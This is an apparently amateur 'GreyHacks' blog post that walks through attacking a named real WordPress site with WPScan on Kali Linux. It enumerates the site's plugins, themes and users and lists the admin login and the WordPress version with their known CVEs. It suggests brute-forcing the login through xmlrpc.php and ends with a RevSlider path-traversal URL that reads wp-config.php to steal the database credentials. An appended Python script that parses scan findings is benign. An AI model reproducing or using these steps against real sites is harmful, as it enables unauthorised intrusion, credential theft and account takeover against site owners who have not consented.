Hacking WordPress CMS Website using Kali Linux 2017.1 | Greyhacks

Welcome to GreyHacks Channel

Today I want to show you how to scan a WordPress CMS site for vulnerabilities with WPScan on Kali Linux.

Make sure you have Kali Linux and have updated it to 2017.1, the latest version.

WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

I hope you understand what I mean; sorry for my English 😛

our target == www.patwa.co.in

-Enumerate installed plugins …
wpscan.rb --url www.patwa.co.in --enumerate p     # this one is for the plugin vulnerability scan

-Enumerate installed themes …
wpscan.rb --url www.patwa.co.in --enumerate t     # for themes

-Enumerate users …
wpscan.rb --url www.patwa.co.in --enumerate u     # this one will get the usernames

-Enumerate installed timthumbs …
wpscan.rb --url www.patwa.co.in --enumerate tt    # timthumbs vulnerability

We should update the database.

http://www.patwa.co.in/xmlrpc.php: lol, this is a vulnerability; it can be used to brute-force the WordPress password as well.

The admin login can be brute-forced in the same way 🙂
Enumerating usernames …
Identified the following 2 user/s:
| Id | Login | Name |
| 1 | admincp | Patwa Blog |
| 2 | – | – |

Not vulnerable 🙂 I will try to use my private tool, but that is not working well 🙂 I hope you agree.

My private tool

The victim's WordPress version is 3.5.1.

Lol, my blue terminal colour looks like a hacker's :P :v

Title: WordPress 3.0-4.7 – Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
Fixed in: 4.7.1

Title: WordPress 3.5-4.7.1 – WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
Fixed in: 4.7.2

If you are an administrator, you should use WPScan to scan your own site and protect it by updating to the latest version.

Reference URLs like these describe the vulnerabilities; you can read them, follow them to exploit that vulnerability, and test it.

You will become a real pentester like Mr. Robot 😛
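For administrators doing that check on their own site, here is an added example (not part of the original post and not WPScan's own code): a Python script that reads saved WPScan text findings like the ones quoted above, lists which are still open for the installed version, and reports the lowest release that contains every fix. The `[!]`/`[i]` line layout and all function names are assumptions; the sample report is constructed from the two findings on this page.

```python
import re
# Constructed sample: the two findings quoted on this page (line layout assumed).
SAMPLE_REPORT = """\
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
    Reference: https://wpvulndb.com/vulnerabilities/8721
[i] Fixed in: 4.7.1

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
[i] Fixed in: 4.7.2
"""

FIELD = re.compile(r"^\s*(?:\[.\]\s*)?(Title|Reference|Fixed in):\s*(.+?)\s*$")

def version_key(version):
    """'4.7.1' -> (4, 7, 1), so 4.10 sorts after 4.9 (string compare gets this wrong)."""
    return tuple(int(n) for n in re.findall(r"\d+", version))

def parse_findings(report):
    """Group Title / Reference / Fixed in lines into one dict per finding."""
    findings = []
    for line in report.splitlines():
        match = FIELD.match(line)
        if not match:
            continue
        key, value = match.groups()
        if key == "Title":
            findings.append({"title": value, "references": [], "fixed_in": None})
        elif findings and key == "Reference":
            findings[-1]["references"].append(value)
        elif findings:
            findings[-1]["fixed_in"] = value
    return findings

def unpatched(findings, installed):
    """Findings not fixed by the installed version (no known fix counts as open)."""
    current = version_key(installed)
    return [f for f in findings
            if f["fixed_in"] is None or version_key(f["fixed_in"]) > current]

def minimum_safe_version(findings):
    """Lowest release containing every listed fix, or None if none has a fix."""
    fixed = [f["fixed_in"] for f in findings if f["fixed_in"]]
    return max(fixed, key=version_key) if fixed else None

if __name__ == "__main__":
    open_items = unpatched(parse_findings(SAMPLE_REPORT), "3.5.1")
    print(len(open_items), "open; upgrade to at least", minimum_safe_version(open_items))
```

For the 3.5.1 install shown on this page, both findings are open and the script reports 4.7.2 as the minimum release.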

ypo-theme ……….NOT VULN

churchope ……….NOT VULN

Contact-Form ……….NOT VULN

HdFlvPlayer ……….NOT VULN

Com_Joomanager ……….NOT VULN

Com_Aceftp ……….NOT VULN

Com_Cck ……….NOT VULN

Com_Sprv ……….NOT VULN

Cms_Config ……….NOT VULN

Revslider Config Found :== www.patwa.co.in/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

That is one of this site's vulnerabilities: we can get the MySQL account, log in and change the password.

This video is for educational purposes only!!

our website: https://www.greyhacks.com
